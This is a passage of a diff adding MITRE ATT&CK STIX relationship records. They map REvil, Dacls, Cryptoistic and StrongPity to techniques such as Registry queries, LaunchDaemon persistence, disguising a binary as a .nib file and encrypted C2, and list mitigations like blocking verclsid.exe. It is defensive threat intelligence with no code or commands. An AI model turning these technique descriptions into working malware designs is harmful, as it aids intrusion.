"2020-08-05T19:18:46.603Z", + "created": "2020-08-05T19:18:46.603Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896", + "external_references": [ + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) can query the Registry to get random file extensions to append to encrypted files.(Citation: Secureworks REvil September 2019)", + "relationship_type": "uses", + "id": "relationship--3a50e0b3-fe35-4cfe-bdd6-306946b15abc", + "type": "relationship", + "modified": "2020-08-05T19:35:39.629Z", + "created": "2020-08-05T19:35:39.629Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--677569f9-a8b0-459e-ab24-7f18091fa7bf", + "external_references": [ + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) can launch an instance of itself with administrative rights using runas.(Citation: Secureworks REvil September 2019)", + "relationship_type": "uses", + "id": "relationship--6b965d3a-130d-4502-963b-111258897615", + "type": "relationship", + "modified": "2020-08-05T19:35:39.635Z", + "created": "2020-08-05T19:35:39.635Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", + "external_references": [ + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + }, + { + "source_name": "McAfee Sodinokibi October 2019", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 What The Code Tells Us. Retrieved August 4, 2020." + }, + { + "source_name": "Picus Sodinokibi January 2020", + "url": "https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware", + "description": "Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020." + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) has infected victim machines through compromised websites and exploit kits.(Citation: Secureworks REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks GandCrab and REvil September 2019)", + "relationship_type": "uses", + "id": "relationship--91ec91fa-f468-47fa-a931-aeb9b4f74ba3", + "type": "relationship", + "modified": "2020-08-06T13:39:24.240Z", + "created": "2020-08-06T13:39:24.240Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", + "external_references": [ + { + "source_name": "G Data Sodinokibi June 2019", + "url": "https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data", + "description": "Han, Karsten. (2019, June 4). Strange Bits: Sodinokibi Spam, CinaRAT, and Fake G DATA. Retrieved August 4, 2020." + }, + { + "source_name": "Cylance Sodinokibi July 2019", + "url": "https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html", + "description": "Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + }, + { + "source_name": "McAfee Sodinokibi October 2019", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 What The Code Tells Us. Retrieved August 4, 2020." + }, + { + "source_name": "Picus Sodinokibi January 2020", + "url": "https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware", + "description": "Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) has been distributed via malicious e-mail attachments including MS Word Documents.(Citation: G Data Sodinokibi June 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Picus Sodinokibi January 2020)", + "relationship_type": "uses", + "id": "relationship--a65fd9d5-0802-44ca-9d8b-025a62455faf", + "type": "relationship", + "modified": "2020-08-06T13:39:24.257Z", + "created": "2020-08-06T13:39:24.257Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3aa169f8-bbf6-44bb-b57d-7f6ada5c2128", + "target_ref": "attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba", + "external_references": [ + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." + }, + { + "source_name": "TrendMicro macOS Dacls May 2020", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/", + "description": "Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus\u2019 Multi-Platform Attack Capability. Retrieved August 10, 2020." + } + ], + "description": "[Dacls](https://attack.mitre.org/software/S0497) can establish persistence via a Launch Daemon.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)", + "relationship_type": "uses", + "id": "relationship--c592018f-2dd6-4787-b429-c25e69d6f1cd", + "type": "relationship", + "modified": "2020-08-10T13:14:05.247Z", + "created": "2020-08-07T20:02:09.991Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3aa169f8-bbf6-44bb-b57d-7f6ada5c2128", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." + }, + { + "source_name": "TrendMicro macOS Dacls May 2020", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/", + "description": "Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus\u2019 Multi-Platform Attack Capability. Retrieved August 10, 2020." + } + ], + "description": "[Dacls](https://attack.mitre.org/software/S0497) can download its payload from a C2 server.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)", + "relationship_type": "uses", + "id": "relationship--38affc70-544f-4211-be66-0d09f7882edb", + "type": "relationship", + "modified": "2020-08-10T13:14:05.252Z", + "created": "2020-08-07T20:02:10.026Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3aa169f8-bbf6-44bb-b57d-7f6ada5c2128", + "target_ref": "attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584", + "external_references": [ + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." + }, + { + "source_name": "TrendMicro macOS Dacls May 2020", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/", + "description": "Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus\u2019 Multi-Platform Attack Capability. Retrieved August 10, 2020." + } + ], + "description": "[Dacls](https://attack.mitre.org/software/S0497) can establish persistence via a LaunchAgent.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)", + "relationship_type": "uses", + "id": "relationship--4c391d8f-4db1-43b3-857e-b8c507f27bdb", + "type": "relationship", + "modified": "2020-08-10T13:14:05.246Z", + "created": "2020-08-07T20:02:10.032Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3aa169f8-bbf6-44bb-b57d-7f6ada5c2128", + "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "external_references": [ + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." + }, + { + "source_name": "TrendMicro macOS Dacls May 2020", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/", + "description": "Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus\u2019 Multi-Platform Attack Capability. Retrieved August 10, 2020." + } + ], + "description": "[Dacls](https://attack.mitre.org/software/S0497) has had its payload named with a dot prefix to make it hidden from view in the Finder application.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)", + "relationship_type": "uses", + "id": "relationship--dff93811-e9f1-430e-95d3-344a067b2e23", + "type": "relationship", + "modified": "2020-08-10T13:14:05.244Z", + "created": "2020-08-07T20:02:10.040Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3aa169f8-bbf6-44bb-b57d-7f6ada5c2128", + "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "external_references": [ + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." + } + ], + "description": "The [Dacls](https://attack.mitre.org/software/S0497) Mach-O binary has been disguised as a .nib file.(Citation: SentinelOne Lazarus macOS July 2020)", + "relationship_type": "uses", + "id": "relationship--ebfa89db-b37b-4b66-a820-b863bd012b80", + "type": "relationship", + "modified": "2020-08-07T20:02:10.041Z", + "created": "2020-08-07T20:02:10.041Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3aa169f8-bbf6-44bb-b57d-7f6ada5c2128", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "external_references": [ + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." + }, + { + "source_name": "TrendMicro macOS Dacls May 2020", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/", + "description": "Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus\u2019 Multi-Platform Attack Capability. Retrieved August 10, 2020." + } + ], + "description": "[Dacls](https://attack.mitre.org/software/S0497) can use HTTPS in C2 communications.(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)", + "relationship_type": "uses", + "id": "relationship--3b1aef91-72a6-4eae-bbc9-94fccc7b4118", + "type": "relationship", + "modified": "2020-08-10T13:14:05.250Z", + "created": "2020-08-07T20:02:10.021Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3aa169f8-bbf6-44bb-b57d-7f6ada5c2128", + "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "external_references": [ + { + "source_name": "TrendMicro macOS Dacls May 2020", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/", + "description": "Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus\u2019 Multi-Platform Attack Capability. Retrieved August 10, 2020." + } + ], + "description": "[Dacls](https://attack.mitre.org/software/S0497) can collect data on running and parent processes.(Citation: TrendMicro macOS Dacls May 2020)", + "relationship_type": "uses", + "id": "relationship--4001577c-16aa-4edc-ba15-1f0f9ba35c13", + "type": "relationship", + "modified": "2020-08-18T15:23:26.785Z", + "created": "2020-08-10T13:14:05.177Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3aa169f8-bbf6-44bb-b57d-7f6ada5c2128", + "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "external_references": [ + { + "source_name": "TrendMicro macOS Dacls May 2020", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/", + "description": "Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus\u2019 Multi-Platform Attack Capability. Retrieved August 10, 2020." + } + ], + "description": "[Dacls](https://attack.mitre.org/software/S0497) can scan directories on a compromised host.(Citation: TrendMicro macOS Dacls May 2020)", + "relationship_type": "uses", + "id": "relationship--e76a5485-4008-4096-820c-87b7dede9e02", + "type": "relationship", + "modified": "2020-08-10T13:14:05.205Z", + "created": "2020-08-10T13:14:05.205Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--3aa169f8-bbf6-44bb-b57d-7f6ada5c2128", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "TrendMicro macOS Dacls May 2020", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/", + "description": "Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus\u2019 Multi-Platform Attack Capability. Retrieved August 10, 2020." + } + ], + "description": "[Dacls](https://attack.mitre.org/software/S0497) can encrypt its configuration file with AES CBC.(Citation: TrendMicro macOS Dacls May 2020)", + "relationship_type": "uses", + "id": "relationship--70f6f99e-d791-4af9-b9c2-23b58fc64546", + "type": "relationship", + "modified": "2020-08-10T13:14:05.225Z", + "created": "2020-08-10T13:14:05.225Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", + "target_ref": "malware--3aa169f8-bbf6-44bb-b57d-7f6ada5c2128", + "external_references": [ + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." + }, + { + "source_name": "TrendMicro macOS Dacls May 2020", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/", + "description": "Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus\u2019 Multi-Platform Attack Capability. Retrieved August 10, 2020." + } + ], + "description": "(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)", + "relationship_type": "uses", + "id": "relationship--79f7d5d7-acbf-4f7e-8530-2f7e637580cd", + "type": "relationship", + "modified": "2020-08-10T14:45:34.710Z", + "created": "2020-08-10T13:16:15.132Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d", + "target_ref": "attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327", + "relationship_type": "mitigates", + "description": "Consider modifying host firewall rules to prevent egress traffic from verclsid.exe.", + "id": "relationship--54add4d1-ab65-451e-b3ab-2c045261b082", + "type": "relationship", + "modified": "2020-08-19T19:29:18.236Z", + "created": "2020-08-10T13:59:38.601Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db", + "target_ref": "attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327", + "relationship_type": "mitigates", + "description": "Use application control configured to block execution of verclsid.exe if it is not required for a given system or network to prevent potential misuse by adversaries.", + "id": "relationship--423ba5d2-6400-4e35-ba8e-dfbedd0b5303", + "type": "relationship", + "modified": "2020-08-19T19:29:18.280Z", + "created": "2020-08-10T13:59:38.605Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--eb88d97c-32f1-40be-80f0-d61a4b0b4b31", + "target_ref": "attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327", + "relationship_type": "mitigates", + "description": "Consider removing verclsid.exe if it is not necessary within a given environment.", + "id": "relationship--9767394f-960b-47d4-8123-cfcc5d6ab66a", + "type": "relationship", + "modified": "2020-08-19T19:29:18.321Z", + "created": "2020-08-10T13:59:38.621Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--808e6329-ca91-4b87-ac2d-8eadc5f8f327", + "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "relationship_type": "subtechnique-of", + "id": "relationship--2f973098-ef83-43a5-9813-a5aef8ff48dc", + "type": "relationship", + "modified": "2020-08-10T13:59:38.625Z", + "created": "2020-08-10T13:59:38.625Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--a04d9a4c-bb52-40bf-98ec-e350c2d6a862", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." + } + ], + "description": "[Cryptoistic](https://attack.mitre.org/software/S0498) has the ability to send and receive files.(Citation: SentinelOne Lazarus macOS July 2020)", + "relationship_type": "uses", + "id": "relationship--dc802d43-a21f-4871-a281-4896817b9bc1", + "type": "relationship", + "modified": "2020-08-10T14:43:04.549Z", + "created": "2020-08-10T14:43:04.549Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--a04d9a4c-bb52-40bf-98ec-e350c2d6a862", + "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "external_references": [ + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." + } + ], + "description": "[Cryptoistic](https://attack.mitre.org/software/S0498) can scan a directory to identify files for deletion.(Citation: SentinelOne Lazarus macOS July 2020)", + "relationship_type": "uses", + "id": "relationship--9e9b9874-f853-4945-9389-54174c2a7bfc", + "type": "relationship", + "modified": "2020-08-10T14:43:04.551Z", + "created": "2020-08-10T14:43:04.551Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--a04d9a4c-bb52-40bf-98ec-e350c2d6a862", + "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "external_references": [ + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." + } + ], + "description": "[Cryptoistic](https://attack.mitre.org/software/S0498) can use TCP in communications with C2.(Citation: SentinelOne Lazarus macOS July 2020)", + "relationship_type": "uses", + "id": "relationship--dd2c9cb1-9c5a-4c97-83e4-4beee309a7cb", + "type": "relationship", + "modified": "2020-08-10T14:43:04.559Z", + "created": "2020-08-10T14:43:04.559Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--a04d9a4c-bb52-40bf-98ec-e350c2d6a862", + "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", + "external_references": [ + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." + } + ], + "description": "[Cryptoistic](https://attack.mitre.org/software/S0498) can engage in encrypted communications with C2.(Citation: SentinelOne Lazarus macOS July 2020)", + "relationship_type": "uses", + "id": "relationship--0d6e04e8-8e4c-4ef6-ab6a-12ddb498e93a", + "type": "relationship", + "modified": "2020-08-10T14:43:04.562Z", + "created": "2020-08-10T14:43:04.562Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--a04d9a4c-bb52-40bf-98ec-e350c2d6a862", + "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "external_references": [ + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." + } + ], + "description": "[Cryptoistic](https://attack.mitre.org/software/S0498) can gather data on the user of a compromised host.(Citation: SentinelOne Lazarus macOS July 2020)", + "relationship_type": "uses", + "id": "relationship--e3fe5089-90fc-47e6-afc7-fb0c41ba7c0c", + "type": "relationship", + "modified": "2020-08-10T14:43:04.594Z", + "created": "2020-08-10T14:43:04.594Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", + "target_ref": "malware--a04d9a4c-bb52-40bf-98ec-e350c2d6a862", + "external_references": [ + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." + } + ], + "description": "(Citation: SentinelOne Lazarus macOS July 2020)", + "relationship_type": "uses", + "id": "relationship--e82e75df-12f9-4d95-b653-dd71a519524f", + "type": "relationship", + "modified": "2020-08-10T14:45:34.595Z", + "created": "2020-08-10T14:45:34.595Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317", + "target_ref": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65", + "relationship_type": "mitigates", + "description": "Periodically review user accounts and remove those that are inactive or unnecessary. Limit the ability for user accounts to create additional accounts.", + "id": "relationship--ff397dfb-a231-423f-8be0-be01eb2c9d4d", + "type": "relationship", + "modified": "2020-10-19T16:01:22.265Z", + "created": "2020-08-10T14:56:56.689Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", + "external_references": [ + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + } + ], + "description": "[StrongPity](https://attack.mitre.org/software/S0491) has a file searcher component that can automatically collect and archive files based on a predefined list of file extensions.(Citation: Bitdefender StrongPity June 2020)", + "relationship_type": "uses", + "id": "relationship--8ec92ea1-6021-4e0f-9737-826e9f243830", + "type": "relationship", + "modified": "2020-08-10T19:52:05.778Z", + "created": "2020-08-10T19:52:05.778Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--cc2399fd-3cd3-4319-8d0a-fbd6420cdaf8", + "target_ref": "attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe", + "relationship_type": "mitigates", + "description": "Routinely check user permissions to ensure only the expected users have the ability to list IAM identities or otherwise discover cloud accounts.", + "id": "relationship--8b9e5b99-2df6-47b4-9c97-9bf8dd01821d", + "type": "relationship", + "modified": "2020-08-13T16:53:55.553Z", + "created": "2020-08-11T13:13:12.320Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + 